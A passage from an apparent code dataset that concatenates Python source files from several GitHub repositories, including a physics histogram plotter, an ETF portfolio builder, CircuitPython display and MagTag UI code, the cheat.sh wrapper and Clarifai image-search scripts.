print("Reading in branch from " + file['name'])
weight_str = "{}*{}".format(file['scale'], plot['cuts'])
if args.verbose:
print("Applying weight: " + weight_str)
hist = utils.MakeHistogram(
file['tree'], plot['name'],
plot['nbins'], plot['xmin'], plot['xmax'],
selections=weight_str,
label=file['label']
)
# Aesthetics
utils.SetHistogramLine(hist, root.TColor.GetColor(file['color']), 2)
if file['fill'] is not None:
utils.SetHistogramFill(hist, root.TColor.GetColor(file['fill']))
hists.append(hist)
# Normalizes histograms to unity
if params['norm']:
utils.NormalizeHistograms(hists)
# Amount to scale the y-axis to allow room for labels/legends
max_factor = 12 if params['logy'] else 1.2
hist_min = utils.GetMinimum(hists)
hist_max = utils.GetMaximum(hists)
# Format histogram
if params['norm']:
utils.FormatHistograms(
hists,
xtitle=plot['label'],
ytitle="Normalized to unity",
max=max_factor * hist_max,
min=0.5*hist_min if params['logy'] else 0
)
else:
utils.FormatHistograms(
hists,
xtitle=plot['label'],
ytitle="Events",
max=max_factor * hist_max,
min=0.5*hist_min + 0.0001 if params['logy'] else 0
)
# Build upper pad for histograms
hist_pad = utils.MakePad("histpad", "", 0, 0.3, 1, 1)
hist_pad.SetBottomMargin(0.03)
hist_pad.Draw()
hist_pad.cd()
utils.DrawHistograms(hists, "hist")
# Remove x-axis labels
for hist in hists:
hist.GetXaxis().SetLabelSize(0)
# Set logarithmic scale on y-axis
if params['logy']:
if args.verbose:
print("Set histogram y-axis to logarithmic scale")
gPad.SetLogy()
# Draw labels and legend on the canvas
astyle.ATLASLabel(0.2, 0.86, "Internal")
for label in params['label']:
utils.DrawText(label['x'], label['y'], label['text'], 1, 0.05)
if 'legend' in params:
legend = utils.MakeLegend(
hists, xmin=params['legend']['x'], ymin=params['legend']['y']
)
legend.Draw()
# Go back to the main canvas before defining lower pad
canv.cd()
# Build lower pad for ratio plots
ratio_pad = utils.MakePad("ratiopad", "", 0, 0, 1, 0.3)
ratio_pad.SetTopMargin(0.01)
ratio_pad.SetBottomMargin(0.35)
ratio_pad.SetGridy() # horizontal grid
ratio_pad.Draw()
ratio_pad.cd()
# Draw the ratio plots
ratio_hist = root.TH1F()
for i, hist in enumerate(hists):
if i == 0:
continue
else:
ratio_hist = hist.Clone("ratio_hist")
ratio_hist.Divide(hists[0])
ratio_hist.SetLineColor(1)
ratio_hist.SetMarkerColor(hist.GetLineColor())
FormatRatioPlot(ratio_hist, 0.4, 2.1, "Ratio")
# Draw line where ratio = 1
utils.DrawLineAt1(ratio_hist, color=2)
gPad.RedrawAxis()
canv.Print("{}/{}_{}.{}".format(
outdir, params['title'], plot['name'], params['ext'])
)
if args.verbose:
print("")
# Cleanup
for file in open_files:
file.Close()
``` |
{
"source": "joeycarter/portfolio-builder",
"score": 2
} |
#### File: joeycarter/portfolio-builder/portfolio-builder.py
```python
import datetime
import enum
import glob
import os
import sys
import click
import tabulate
import pandas as pd
import numpy as np
import yfinance as yf
# Custom exceptions
class PortfolioException(Exception):
"""Exceptions related to the portfolio builder."""
pass
# Error messages
def echo_warning(msg):
click.echo(f"{click.style('warning:', fg='yellow', bold=True)} {msg}", err=True)
def echo_error(msg):
click.echo(f"{click.style('error:', fg='red', bold=True)} {msg}", err=True)
def echo_fatal(msg):
click.echo(f"{click.style('fatal:', fg='red', bold=True)} {msg}", err=True)
class Mode(enum.Enum):
build = 1 # Build a portfolio from scratch
rebalance = 2 # Rebalance an existing portfolio
class Portfolio:
"""An object to represent a portfolio.
Parameters
----------
risk_level : int
Risk level (0 to 10).
targets : str
Either the path to file containing ETF allocation targets, or the name of a
predefined portfolio. If it is the latter, the portfolio builder will search the
`targets/` directory for a file of the form `<targets>.csv`, where `<targets>`
is the name provided.
account_file : str
Path to account data file. Account data is only used when rebalancing a
portfolio. If none is provided, the portfolio builder searches the 'accounts/'
directory for .csv files containing account data.
cash : float
Cash to invest (CAD).
fractions : bool
Allow fractions when computing number of shares to buy/sell. Normally these
numbers are required to be whole numbers.
mode : :class:`.Mode`
Portfolio mode. Choose from `build` (build a portfolio from scratch) and
`rebalance` (rebalance an existing portfolio).
verbose : bool, int
Be verbose.
"""
def __init__(
self, risk_level, targets, account_file, cash, fractions, mode, verbose
):
self.risk_level = risk_level
self.targets = targets
self.account_file = account_file
self.cash = cash
self.fractions = fractions
self.mode = mode
self.verbose = verbose
if os.path.isfile(self.targets):
self.allocations = pd.read_csv(self.targets, index_col=0)
elif os.path.isfile(os.path.join("targets", f"{self.targets}.csv")):
self.allocations = pd.read_csv(
os.path.join("targets", f"{self.targets}.csv"), index_col=0
)
else:
raise PortfolioException(f"could not open targets file '{self.targets}'")
self.current_prices = None
self.shares = None
if self.mode == Mode.build:
self.account = None
elif self.mode == Mode.rebalance:
self.account = self._read_account_data(self.account_file)
else:
raise PortfolioException(f"unknown portfolio mode '{self.mode}'")
def _read_account_data(self, account_file=None):
"""Read current account data.
If `account_file` is None, this function searches the 'accounts/' directory for
.csv files. If more than one file is found, the user is prompted to select which
one to use.
Parameters
----------
account_file : str, optional
Path to account data file. See note above if `None` is passed.
Returns
-------
account : pandas.DataFrame
Current account data as a pandas DataFrame.
"""
click.echo("Reading current account data...")
if account_file is None:
account_files = glob.glob("accounts/*.csv")
if len(account_files) == 1:
account_file = account_files[0]
elif len(account_files) > 1:
click.echo("Found multiple account data files:")
for i, account_file in enumerate(account_files):
click.echo(f" ({i}) {account_file}")
while True:
index = click.prompt(
"Please enter which account file you would like to use",
type=int,
)
if index >= 0 and index < len(account_files):
break
else:
click.echo(f"Error: invalid account file {index}")
account_file = account_files[index]
else:
raise PortfolioException("no account data file")
if self.verbose:
click.echo(f" -> Reading account data from file '{account_file}'")
account = pd.read_csv(account_file)
# You can add the target risk in your account data file for reference,
# but we do not want the dataframe to keep this information
if "risk" in account.columns:
account.drop("risk", axis="columns", inplace=True)
return account.iloc[0] # For now only return first row
def build(self):
"""Build the current portfolio based on current prices and available cash."""
click.echo("Retrieving current ETF prices...")
# Retrieve data for past 5 days
# Ensures data is available if running on a day when markets are closed
start_time = datetime.datetime.now() - datetime.timedelta(days=5)
self.current_prices = yf.download(
" ".join(self.allocations.columns), start=start_time
)["Close"].iloc[-1]
click.echo("Done")
# Use same ticker order
self.current_prices = self.current_prices.reindex(self.allocations.columns)
if self.mode == Mode.build:
# Build from scratch
self.shares = (
self.cash
* (self.allocations.loc[self.risk_level] / 100)
/ self.current_prices
)
elif self.mode == Mode.rebalance:
# Check that target and account securities agree
if not self.allocations.columns.equals(self.account.index):
raise PortfolioException("target and account securities do not agree")
# Rebalance current portfolio
self.shares = (
(self.allocations.loc[self.risk_level] / 100)
* (self.cash + np.sum(self.account * self.current_prices))
- self.account * self.current_prices
) / self.current_prices
if not self.fractions:
self.shares = np.floor(self.shares).astype("int")
if np.all(self.shares == 0):
echo_warning("Insufficient funds to build portfolio to targets")
click.echo()
def print_portfolio(self):
"""Print the built portfolio."""
if self.shares is None:
echo_warning("cannot display portfolio: portfolio has not been built yet")
return
if self.mode == Mode.build:
data = {
"ETF": self.shares.index.to_list(),
"Price\n(CAD)": self.current_prices.to_list(),
"To\nBuy/Sell": self.shares.to_list(),
"Value\n(CAD)": (self.shares * self.current_prices).to_list(),
"% of\nPortfolio": (
100
* (self.shares * self.current_prices)
/ np.sum(self.shares * self.current_prices)
).to_list(),
"Target % of\nPortfolio": self.allocations.loc[
self.risk_level
].to_list(),
}
if self.fractions:
fmt = ("", ".3f", ".2f", ".2f", ".2f", ".2f")
else:
fmt = ("", ".3f", "", ".2f", ".2f", ".2f")
elif self.mode == Mode.rebalance:
total_shares = self.shares + self.account
data = {
"ETF": self.shares.index.to_list(),
"Price\n(CAD)": self.current_prices.to_list(),
"Current\nQuantity": self.account.to_list(),
"To\nBuy/Sell": self.shares.to_list(),
"Total\nQuantity": total_shares.to_list(),
"Value\n(CAD)": (total_shares * self.current_prices).to_list(),
"% of\nPortfolio": (
100
* (total_shares * self.current_prices)
/ np.sum(total_shares * self.current_prices)
).to_list(),
"Target % of\nPortfolio": self.allocations.loc[
self.risk_level
].to_list(),
}
if self.fractions:
fmt = ("", ".3f", "", ".2f", ".2f", ".2f", ".2f", ".2f")
else:
fmt = ("", ".3f", "", "", ".2f", ".2f", ".2f", ".2f")
click.echo("Your portfolio:")
click.echo("~~~~~~~~~~~~~~~\n")
click.echo(tabulate.tabulate(data, headers="keys", floatfmt=fmt))
total_cost = np.sum(self.shares * self.current_prices)
leftover_cash = self.cash - total_cost
click.echo()
click.echo(f"Total cost: ${total_cost:.2f} CAD")
click.echo(f"Leftover cash: ${leftover_cash:.2f} CAD")
@click.command(context_settings=dict(help_option_names=["-h", "--help"]))
@click.option(
"-r",
"--risk-level",
type=click.IntRange(0, 10),
prompt="Enter your risk level (0 to 10)",
help="Risk level on a scale from 0 (all bonds) to 10 (all equities).",
)
@click.option(
"-t",
"--targets",
prompt=(
"Enter the path to file containing ETF allocation targets or the name of the"
" portfolio"
),
help=(
"Either the path to file containing ETF allocation targets, or the name of a"
" predefined portfolio. If it is the latter, the portfolio builder will search"
" the `targets/` directory for a file of the form `<targets>.csv`, where"
" `<targets>` is the name provided."
),
)
@click.option(
"-a",
"--account",
type=click.Path(exists=True),
help=(
"Path to account data file. Account data is only used when rebalancing a"
" portfolio. If none is provided, the portfolio builder searches the"
" 'accounts/' directory for .csv files containing account data."
),
)
@click.option(
"-c",
"--cash",
type=float,
prompt="Enter your cash available to invest (CAD)",
help="Cash available to invest (CAD).",
)
@click.option(
"-f",
"--fractions",
is_flag=True,
default=False,
help=(
"Allow fractions when computing number of shares to buy/sell. Normally these"
" numbers are required to be whole numbers."
),
)
@click.option(
"--rebalance",
is_flag=True,
default=False,
help=(
"Rebalance an existing portfolio. Place accounts in your portfolio in the"
" 'accounts/' directory."
),
)
@click.option(
"-v",
"--verbose",
count=True,
help="Be verbose. Multiple -v options increase the verbosity.",
)
def main(risk_level, targets, account, cash, fractions, rebalance, verbose):
"""A simple tool to build an ETF-based portfolio with a mix of bonds and equities
depending on your preferred risk level and available cash.
"""
try:
mode = Mode.rebalance if rebalance else Mode.build
portfolio = Portfolio(
risk_level, targets, account, cash, fractions, mode, verbose
)
portfolio.build()
portfolio.print_portfolio()
except KeyboardInterrupt:
return 1
except PortfolioException as err:
echo_error(err)
except Exception as err:
echo_fatal(f"an unknown exception occurred: {err}")
raise
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "joeycastillo/babel",
"score": 3
} |
#### File: CircuitPython/display_bidi_text/bidi_label.py
```python
import displayio
from adafruit_display_text import label
class BidiLabel(label.Label):
def _update_text(self, new_text): # pylint: disable=too-many-locals
x = 0
y = 0
i = 0
direction = 1
old_c = 0
y_offset = int((self.font.get_glyph(ord('M')).height -
new_text.count('\n') * self.height * self.line_spacing) / 2)
#print("y offset from baseline", y_offset)
top = bottom = left = right = 0
for character in new_text:
if character == '\n':
y += int(self.height * self._line_spacing)
x = 0
continue
glyph = self.font.get_glyph(ord(character))
if not glyph:
continue
if direction == -1 and glyph.mirrored:
glyph = self.font.get_glyph(glyph.mirrored)
if glyph.rtl and direction == 1:
if x != 0:
y += int(self.height * self._line_spacing)
x = 0
direction = -1
elif glyph.ltr and direction == -1:
if x != 0:
y += int(self.height * self._line_spacing)
x = 0
direction = 1
right = max(right, x+glyph.width*direction)
if y == 0: # first line, find the Ascender height
top = min(top, -glyph.height+y_offset)
bottom = max(bottom, y-glyph.dy+y_offset)
position_y = y - glyph.height - glyph.dy + y_offset
position_x = x + glyph.dx * direction
if not self._text or old_c >= len(self._text) or character != self._text[old_c]:
try:
face = displayio.TileGrid(glyph.bitmap, pixel_shader=self.palette,
default_tile=glyph.tile_index,
tile_width=glyph.width, tile_height=glyph.height,
position=(position_x, position_y))
except TypeError:
face = displayio.TileGrid(glyph.bitmap, pixel_shader=self.palette,
default_tile=glyph.tile_index,
tile_width=glyph.width, tile_height=glyph.height,
x=position_x, y=position_y)
if i < len(self):
self[i] = face
else:
self.append(face)
elif self._text and character == self._text[old_c]:
try:
self[i].position = (position_x, position_y)
except AttributeError:
self[i].x = position_x
self[i].y = position_y
x += glyph.shift_x * direction
# TODO skip this for control sequences or non-printables.
i += 1
old_c += 1
# skip all non-prinables in the old string
while (self._text and old_c < len(self._text) and
(self._text[old_c] == '\n' or not self.font.get_glyph(ord(self._text[old_c])))):
old_c += 1
# Remove the rest
while len(self) > i:
self.pop()
self._text = new_text
self._boundingbox = (left, top, left+right, bottom-top)
``` |
{
"source": "joeycastillo/circuitpyui",
"score": 3
} |
#### File: examples/MagTag/minimal.py
```python
import time
import board
import neopixel_write
import digitalio
import displayio
import terminalio
from digitalio import DigitalInOut, Pull
import circuitpyui
from circuitpyui import Event
from circuitpyui.common_tasks import ButtonInput, SleepTask, EPDRefreshTask
display = board.DISPLAY
font = terminalio.FONT
colors = [[255, 255, 255],
[0, 255, 0],
[255, 255, 0],
[255, 0, 0],
[255, 0, 255],
[0, 0, 255],
[0, 255, 255]]
class MyApplication(circuitpyui.Application):
"""This is a very basic application with two buttons: one to toggle the Neopixels, another to change their color.
It demonstrates creating and adding circuitpyui views, adding callbacks, and the basics of focus in button-based UI.
This MagTag version also demonstrates creating a ButtonInput task with buttons connected directly to GPIO pins, and
the use of an EPDRefreshTask to automatically update an e-paper display when the UI requires an update.
"""
def __init__(self, window):
# always call super.init to set the window
super().__init__(window)
# color index and light status are internal state; they get encapsulated with the Application
self.color_index = 0
self.light_is_on = False
self.light_pin = digitalio.DigitalInOut(board.NEOPIXEL)
self.light_pin.direction = digitalio.Direction.OUTPUT
# MagTag can shut down power to the Neopixels when not in use. Set high at first to keep them powered down.
self.power_pin = DigitalInOut(board.NEOPIXEL_POWER)
self.power_pin.switch_to_output()
self.power_pin.value = True
# next we create our first button and add it as a subview.
self.toggle_button = circuitpyui.Button(x=16, y=16, width=display.width - 32, height=(display.height - 32) // 3, text="Toggle Neopixels")
self.window.add_subview(self.toggle_button)
# since we have no touchscreen, the user will select an active element using the directional pad.
# we need to set one of the views to be active in order to highlight it and create a start point for navigation.
self.toggle_button.become_active()
# this line attaches an action to the button. When the button receives an Event.TAPPED event, turn_light_on will be called.
self.toggle_button.set_action(MyApplication.turn_light_on, Event.TAPPED)
# creating the second button is similar to the first, but we won't tell it to become active.
self.color_button = circuitpyui.Button(x=16, y=16+ 2 * (display.height - 32) // 3, width=display.width - 32, height=(display.height - 32) // 3, text="Change Color")
self.window.add_subview(self.color_button)
self.color_button.set_action(MyApplication.color_cycle, Event.TAPPED)
# we need to tell the window which button should receive focus when an arrow button is pressed
# this interface is simple: when the top button is active and we press 'down', select the bottom button.
self.window.set_focus_targets(self.toggle_button, down=self.color_button)
# and vice versa when the bottom button is selected and we press 'up'. all other directions will leave the selection alone.
self.window.set_focus_targets(self.color_button, up=self.toggle_button)
# Set up the (physical) buttons!
left_button = DigitalInOut(board.BUTTON_A)
left_button.switch_to_input(Pull.UP)
up_button = DigitalInOut(board.BUTTON_B)
up_button.switch_to_input(Pull.UP)
down_button = DigitalInOut(board.BUTTON_C)
down_button.switch_to_input(Pull.UP)
right_button = DigitalInOut(board.BUTTON_D)
right_button.switch_to_input(Pull.UP)
# MagTag's four buttons could be used as a D-pad, but we need a select button, so this setup only allows up and down motion.
# Right acts like PyGamer's A button, which in circuitpyui taps an element. Left acts like PyGamer's B button.
self.add_task(ButtonInput([(up_button, False, Event.BUTTON_UP),
(down_button, False, Event.BUTTON_DOWN),
(left_button, False, Event.BUTTON_B),
(right_button, False, Event.BUTTON_A)]))
# EPD Refresh Task will update the screen as needed
self.add_task(EPDRefreshTask(display))
# and sleep task will keep us from repeatedly calling the same callback when the button is pressed.
self.add_task(SleepTask(0.1))
# finally, this is a displayio call! showing the window shows the whole view hierarchy that we have set up
display.show(window)
def turn_light_on(self, event):
self.light_is_on = True
self.update_lights()
self.toggle_button.set_action(MyApplication.turn_light_off, Event.TAPPED)
def turn_light_off(self, event):
self.light_is_on = False
self.update_lights()
self.toggle_button.set_action(MyApplication.turn_light_on, Event.TAPPED)
def color_cycle(self, event):
self.color_index = (self.color_index + 1) % len(colors)
self.update_lights()
def update_lights(self):
if self.light_is_on:
# power Neopixels up
self.power_pin.value = False
# write the current color
neopixel_write.neopixel_write(self.light_pin, bytearray(colors[self.color_index] * 4))
else:
# power Neopixels down
self.power_pin.value = True
# style defaults to white on black for normal controls, with black on white (inverse) for active controls
# we still need to specify a style, as any text labels will expect a font.
style = circuitpyui.Style(font=font)
# create our window. This is the only displayio object we are going to show(); after this, we manage all
# of our UI by managing the window's subviews.
window = circuitpyui.Window(x=0, y=0, width=display.width, height=display.height, style=style, max_size=2)
# instantiate the application...
app = MyApplication(window)
# ...and run it! this will keep running in a loop indefinitely
app.run()
``` |
{
"source": "joeyciechanowicz/cheat.sh",
"score": 3
} |
#### File: cheat.sh/lib/cheat_wrapper.py
```python
from gevent.monkey import patch_all
from gevent.subprocess import Popen, PIPE
patch_all()
# pylint: disable=wrong-import-position,wrong-import-order
import sys
import os
import re
import colored
from pygments import highlight as pygments_highlight
from pygments.formatters import Terminal256Formatter # pylint: disable=no-name-in-module
MYDIR = os.path.abspath(os.path.join(__file__, '..', '..'))
sys.path.append("%s/lib/" % MYDIR)
from globals import error, ANSI2HTML, COLOR_STYLES
from buttons import TWITTER_BUTTON, GITHUB_BUTTON, GITHUB_BUTTON_FOOTER
from languages_data import LEXER, LANGUAGE_ALIAS
from get_answer import get_topic_type, get_topics_list, get_answer, find_answer_by_keyword
from beautifier import code_blocks
# import beautifier
# pylint: disable=wrong-import-position,wrong-import-order
ANSI_ESCAPE = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
def remove_ansi(sometext):
"""
Remove ANSI sequences from `sometext` and convert it into plaintext.
"""
return ANSI_ESCAPE.sub('', sometext)
def html_wrapper(data):
"""
Convert ANSI text `data` to HTML
"""
proc = Popen(
["bash", ANSI2HTML, "--palette=solarized", "--bg=dark"],
stdin=PIPE, stdout=PIPE, stderr=PIPE)
data = data.encode('utf-8')
stdout, stderr = proc.communicate(data)
if proc.returncode != 0:
error(stdout + stderr)
return stdout.decode('utf-8')
def _colorize_internal(topic, answer, html_needed):
def _colorize_line(line):
if line.startswith('T'):
line = colored.fg("grey_62") + line + colored.attr('reset')
line = re.sub(r"\{(.*?)\}", colored.fg("orange_3") + r"\1"+colored.fg('grey_35'), line)
return line
line = re.sub(r"\[(F.*?)\]",
colored.bg("black") + colored.fg("cyan") + r"[\1]"+colored.attr('reset'),
line)
line = re.sub(r"\[(g.*?)\]",
colored.bg("dark_gray") \
+ colored.fg("grey_0") \
+ r"[\1]"+colored.attr('reset'),
line)
line = re.sub(r"\{(.*?)\}",
colored.fg("orange_3") + r"\1"+colored.attr('reset'),
line)
line = re.sub(r"<(.*?)>",
colored.fg("cyan") + r"\1"+colored.attr('reset'),
line)
return line
if topic in [':list', ':bash_completion']:
return answer
if topic == ':firstpage-v1':
lines = answer.splitlines()
answer_lines = lines[:9]
answer_lines.append(colored.fg('grey_35')+lines[9]+colored.attr('reset'))
for line in lines[10:]:
answer_lines.append(_colorize_line(line))
if html_needed:
answer_lines = answer_lines[:-2]
answer = "\n".join(answer_lines) + "\n"
return answer
def _colorize_ansi_answer(topic, answer, color_style, # pylint: disable=too-many-arguments
highlight_all=True, highlight_code=False,
unindent_code=False):
color_style = color_style or "native"
lexer_class = LEXER['bash']
if '/' in topic:
section_name = topic.split('/', 1)[0].lower()
section_name = LANGUAGE_ALIAS.get(section_name, section_name)
lexer_class = LEXER.get(section_name, lexer_class)
if section_name == 'php':
answer = "<?\n%s?>\n" % answer
if highlight_all:
highlight = lambda answer: pygments_highlight(
answer, lexer_class(), Terminal256Formatter(style=color_style)).strip('\n')+'\n'
else:
highlight = lambda x: x
if highlight_code:
blocks = code_blocks(answer, wrap_lines=True, unindent_code=(4 if unindent_code else False))
highlighted_blocks = []
for block in blocks:
if block[0] == 1:
this_block = highlight(block[1])
else:
this_block = block[1].strip('\n')+'\n'
highlighted_blocks.append(this_block)
result = "\n".join(highlighted_blocks)
else:
result = highlight(answer).lstrip('\n')
return result
def _github_button(topic_type):
repository = {
"cheat.sheets" : 'chubin/cheat.sheets',
"cheat.sheets dir" : 'chubin/cheat.sheets',
"tldr" : 'tldr-pages/tldr',
"cheat" : 'chrisallenlane/cheat',
"learnxiny" : 'adambard/learnxinyminutes-docs',
"internal" : '',
"search" : '',
"unknown" : '',
}
full_name = repository.get(topic_type, '')
if not full_name:
return ''
short_name = full_name.split('/', 1)[1] # pylint: disable=unused-variable
button = (
"<!-- Place this tag where you want the button to render. -->"
'<a aria-label="Star %(full_name)s on GitHub"'
' data-count-aria-label="# stargazers on GitHub"'
' data-count-api="/repos/%(full_name)s#stargazers_count"'
' data-count-href="/%(full_name)s/stargazers"'
' data-icon="octicon-star"'
' href="https://github.com/%(full_name)s"'
' class="github-button">%(short_name)s</a>'
) % locals()
return button
def _render_html(query, result, editable, repository_button, request_options):
result = result + "\n$"
result = html_wrapper(result)
title = "<title>cheat.sh/%s</title>" % query
# title += ('\n<link rel="stylesheet" href="/files/awesomplete.css" />script'
# ' src="/files/awesomplete.min.js" async></script>')
# submit button: thanks to http://stackoverflow.com/questions/477691/
submit_button = ('<input type="submit" style="position: absolute;'
' left: -9999px; width: 1px; height: 1px;" tabindex="-1" />')
topic_list = ('<datalist id="topics">%s</datalist>'
% ("\n".join("<option value='%s'></option>" % x for x in get_topics_list())))
curl_line = "<span class='pre'>$ curl cheat.sh/</span>"
if query == ':firstpage':
query = ""
form_html = ('<form action="/" method="GET"/>'
'%s%s'
'<input'
' type="text" value="%s" name="topic"'
' list="topics" autofocus autocomplete="off"/>'
'%s'
'</form>') \
% (submit_button, curl_line, query, topic_list)
edit_button = ''
if editable:
# It's possible that topic directory starts with omitted underscore
if '/' in query:
query = '_' + query
edit_page_link = 'https://github.com/chubin/cheat.sheets/edit/master/sheets/' + query
edit_button = (
'<pre style="position:absolute;padding-left:40em;overflow:visible;height:0;">'
'[<a href="%s" style="color:cyan">edit</a>]'
'</pre>') % edit_page_link
result = re.sub("<pre>", edit_button + form_html + "<pre>", result)
result = re.sub("<head>", "<head>" + title, result)
if not request_options.get('quiet'):
result = result.replace('</body>',
TWITTER_BUTTON \
+ GITHUB_BUTTON \
+ repository_button \
+ GITHUB_BUTTON_FOOTER \
+ '</body>')
return result
def _visualize(query, keyword, answers, request_options, html=None): # pylint: disable=too-many-locals
search_mode = bool(keyword)
highlight = not bool(request_options and request_options.get('no-terminal'))
color_style = request_options.get('style', '')
if color_style not in COLOR_STYLES:
color_style = ''
found = True # if the page was found in the database
editable = False # can generated page be edited on github (only cheat.sheets pages can)
result = ""
for topic, answer in answers: # pylint: disable=too-many-nested-blocks
if topic == 'LIMITED':
result += colored.bg('dark_goldenrod') \
+ colored.fg('yellow_1') \
+ ' ' + answer + ' ' \
+ colored.attr('reset') + "\n"
break
topic_type = get_topic_type(topic)
highlight = (highlight
and topic not in [":list", ":bash_completion"]
and topic_type not in ["unknown"]
)
found = found and not topic_type == 'unknown'
editable = editable or topic_type == "cheat.sheets"
if topic_type == "internal" and highlight:
answer = _colorize_internal(topic, answer, html)
else:
answer = _colorize_ansi_answer(
topic, answer, color_style,
highlight_all=highlight,
highlight_code=(topic_type == 'question'
and not request_options.get('add_comments')
and not request_options.get('remove_text')),
unindent_code=request_options.get('unindent_code')
)
if search_mode:
if not highlight:
result += "\n[%s]\n" % topic
else:
result += "\n%s%s %s %s%s\n" % (colored.bg('dark_gray'),
colored.attr("res_underlined"),
topic,
colored.attr("res_underlined"),
colored.attr('reset'))
result += answer
result = result.strip('\n') + "\n"
if search_mode:
editable = False
repository_button = ''
else:
repository_button = _github_button(topic_type)
if html and query:
result = _render_html(
query, result, editable, repository_button, request_options)
return result, found
def _sanitize_query(query):
return re.sub('[<>"]', '', query)
def cheat_wrapper(query, request_options=None, html=False):
"""
Giant megafunction that delivers cheat sheet for `query`.
If `html` is True, the answer is formatted as HTML.
Additional request options specified in `request_options`.
This function is really really bad, and should be rewritten
as soon as possible.
"""
def _strip_hyperlink(query):
return re.sub('(,[0-9]+)+$', '', query)
def _parse_query(query):
topic = query
keyword = None
search_options = ""
keyword = None
if '~' in query:
topic = query
pos = topic.index('~')
keyword = topic[pos+1:]
topic = topic[:pos]
if '/' in keyword:
search_options = keyword[::-1]
search_options = search_options[:search_options.index('/')]
keyword = keyword[:-len(search_options)-1]
return topic, keyword, search_options
query = _sanitize_query(query)
# at the moment, we just remove trailing slashes
# so queries python/ and python are equal
query = _strip_hyperlink(query.rstrip('/'))
topic, keyword, search_options = _parse_query(query)
if keyword:
answers = find_answer_by_keyword(
topic, keyword, options=search_options, request_options=request_options)
else:
answers = [(topic, get_answer(topic, keyword, request_options=request_options))]
return _visualize(query, keyword, answers, request_options, html=html)
``` |
{
"source": "joeycmlam/topawards-services",
"score": 2
} |
#### File: topawards-services/src/clarifai_predict_demo.py
```python
from clarifai.rest import ClarifaiApp
from clarifai.rest import Image as ClImage
from googleapiclient.discovery import build
import pprint
import json
from PIL import Image
import urllib.request
import io
import config
import clsMySysImage
from tool_lang import google_translate
def google_search(search_term, api_key, cse_id, start, **kwargs):
service = build("customsearch", "v1", developerKey=api_key)
res = service.cse().list(q=search_term, cx=cse_id, searchType="image", start=start, **kwargs).execute()
return res
def open_result(url_link):
with urllib.request.urlopen(url_link) as url:
f = io.BytesIO(url.read())
img = Image.open(f)
img.show()
def valid_result(url, outputs, rating, search_item):
try:
isShow = False
for output in outputs:
#if output['value'] >= rating and output['name'] in search_item:
if output['value'] >= rating:
print ('show result: {0} - {1:10.5f} {2}'.format(output['name'], output['value'], url))
isShow = True
break
if isShow:
#record = clsImage(url, outputs)
open_result(url)
else:
pprint.pprint(outputs)
except Exception as e:
pprint.pprint(e)
pprint.pprint(outputs)
def predict_by_url(url_link, model):
try:
response = model.predict([ClImage(url=url_link)])
return response['outputs'][0]['data']['concepts']
except Exception as e:
print('skip: {0}'.format(url_link))
def predict_by_localfile(file, model):
response = model.predict([ClImage(file_obj=open(file, 'rb'))])
return response['outputs'][0]['data']['concepts']
def process_result(search_item, results, model, selfConfig):
idx = 0
for result in results:
idx += 1
print('link {0}: {1}'.format(idx, result['link']))
outputs = predict_by_url(result['link'], model)
valid_result(url=result['link'], outputs=outputs, rating=selfConfig['MIN_RATING'], search_item=search_item)
def predictImage(selfConfig, search_item):
start_posn = 1
max_posn = selfConfig['MAX_SEARCH']
while start_posn >= 1 and start_posn < max_posn:
print ('print start: {0}'.format(start_posn))
results = google_search(search_item, selfConfig['DEFAULT']['GOOGLE_API_KEY'], selfConfig['DEFAULT']['GOOGLE_CSE_ID'], start_posn)
process_result(search_item, results['items'], theModel, selfConfig)
start_posn = results['queries']['nextPage'][0]['startIndex']
if __name__ == "__main__":
print ('First Clarifai Image Analysis...')
theConfig = config.getConfig('../resource/config-prd.json')
src_lang='en'
#dest_lang=['ja', 'ko', 'id', 'zh-tw']
dest_lang=['ja', 'ko','id', 'vi', 'th', 'fil']
search_item = input('Please input the search key: ')
app = ClarifaiApp(api_key=theConfig['DEFAULT']['CLARIFAI_API_KEY'])
theModel = app.models.get('myModel')
# theModel = app.models.get('general-v1.3')
for dest in dest_lang:
translate_result = google_translate(input_key=search_item, src_lang=src_lang, dest_lang=dest)
print('{0}: {1}'.format(dest, translate_result.text))
predictImage(theConfig, translate_result.text)
print ('Completed!')
```
#### File: topawards-services/src/config.py
```python
import json
import pprint
def getConfig(file):
with open(file, 'r') as f:
config = json.load(f)
return config
if __name__ == "__main__":
config = getConfig('../resource/config-prd.json')
pprint.pprint(config)
```
#### File: topawards-services/src/main.py
```python
import tkinter as tk
import clarifai_predict as engine
import config
from PIL import ImageTk, Image
import urllib.request
import io
from clsMySysImage import mysysImages
import json
def search_images():
print("Search Item: %s." % (e1.get()))
process_search_image(1)
print('Completed!')
def process_search_image(posn):
theConfig = config.getConfig('../resource/config-prd.json')
results = engine.predictImage(theConfig, e1.get(), posn)
json_msg = json.loads(results)
show_result(json_msg)
def show_result(results):
for record in results:
try:
engine.open_result(record)
except Exception as err:
print("show_result: {0}".format(err))
def change_start_posn(root):
# Apparently a common hack to get the window size. Temporarily hide the
# window to avoid update_idletasks() drawing the window in the wrong
# position.
root.withdraw()
root.update_idletasks() # Update "requested size" from geometry manager
x = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2
y = (root.winfo_screenheight() - root.winfo_reqheight()) / 2
root.geometry("+%d+%d" % (x, y))
# This seems to draw the window frame immediately, so only call deiconify()
# after setting correct window position
root.deiconify()
def process_next_page():
pos = res.get_next_page()
print('next result: {0}'.format(pos))
process_search_image(pos)
print('Completed!')
if __name__ == "__main__":
res = mysysImages()
master = tk.Tk()
font_size = ('Verdana', 20)
tk.Label(master, text="Search: ", font=font_size).grid(row=0)
e1 = tk.Entry(master, font=font_size)
e1.grid(row=0, column=1)
tk.Button(master, text='Quit', command=master.quit, font=font_size).grid(row=3, column=0, pady=4)
tk.Button(master, text='Run', command=search_images, fg="Blue",font=font_size).grid(row=3, column=1, pady=4)
tk.Button(master, text='Next', command=process_next_page, fg="Blue",font=font_size).grid(row=3, column=2, pady=4)
change_start_posn(root=master)
tk.mainloop( )
``` |
{
"source": "joeycw/tashares",
"score": 3
} |
#### File: tashares/tashares/stockhist.py
```python
import yfinance as yf
import pandas as pd
from datetime import datetime
from pathlib import Path
import logging
from tashares.cfg import config
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
class Stockhist(object):
"""wrap yfinance to download stock history.
- Input: stock symbol.
- Output: save stock price daily history into a file.
there are two modes:
1. load from the local file of stock history (by default)
